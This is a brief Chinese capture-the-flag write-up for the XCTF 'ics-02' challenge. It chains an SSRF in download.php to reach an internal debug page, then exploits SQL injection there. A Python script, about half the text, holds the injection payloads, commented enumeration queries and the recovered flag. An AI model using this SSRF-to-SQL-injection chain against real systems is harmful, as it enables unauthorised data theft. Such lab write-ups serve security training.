[wp] 攻防世界 ics-02

进去扫目录发现/secret

无法直接进入secret_debug.php 显示ip不对
点paper会向download.php传参,可以下载一个ssrf内容的pdf,
于是想到利用ssrf来访问secret_debug.php

发现参数s,fuzz一下,发现s=3时会有如下返回

经测试在此页面发现sql注入漏洞,进行注入得到flag,脚本如下:

import requests
import random
import urllib

url = 'http://111.198.29.45:52536/download.php'

# subquery = "database()"
# ssrfw
# subquery = "select table_name from information_schema.tables where table_schema='ssrfw' LIMIT 1"
# cetcYssrf
# subquery = "select column_name from information_schema.columns where table_name='cetcYssrf' LIMIT 1"
# secretname -> flag
# subquery = "select column_name from information_schema.columns where table_name='cetcYssrf' LIMIT 1, 1"
# value -> flag{cpg9ssnu_OOOOe333eetc_2018}
subquery = "select value from cetcYssrf LIMIT 1"

id = random.randint(1, 10000000)

d = ('http://127.0.0.1/secret/secret_debug.php?' +
        urllib.parse.urlencode({
            "s": "3",
            "txtfirst_name": "L','1',("+subquery+"),'1'/*",
            "txtmiddle_name": "m",
            "txtLast_name": "y",
            "txtname_suffix": "Esq.",
            "txtdob": "*/,'01/10/2019",
            "txtdl_nmbr": id,
            "txtRetypeDL": id
            }) + "&")


r = requests.get(url, params={"dl": d})
print(r.text)